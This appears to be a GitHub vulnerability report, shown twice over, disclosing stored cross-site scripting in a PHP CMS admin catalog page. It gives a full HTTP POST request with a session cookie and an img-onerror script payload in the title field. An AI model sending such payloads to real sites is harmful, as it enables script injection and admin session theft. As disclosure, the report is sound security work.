poc
POST /admin1/catalog/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 334
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/catalog/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close
{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"}
then you can view xss in url http://192.168.3.129:8091/admin1#catalog/index
The text was updated successfully, but these errors were encountered:
<img src=1 onerror=alert("xss");>
url
http://192.168.3.129:8091/admin1#catalog/index

poc POST /admin1/catalog/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 334 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/catalog/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo_url":"test","bind_html":"","group_id":[],"links_type":0,"links_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo_title":"","seo_keywords":"","seo_description":"","field":[],"theme":"template"}


then you can view xss in url
http://192.168.3.129:8091/admin1#catalog/index
The text was updated successfully, but these errors were encountered: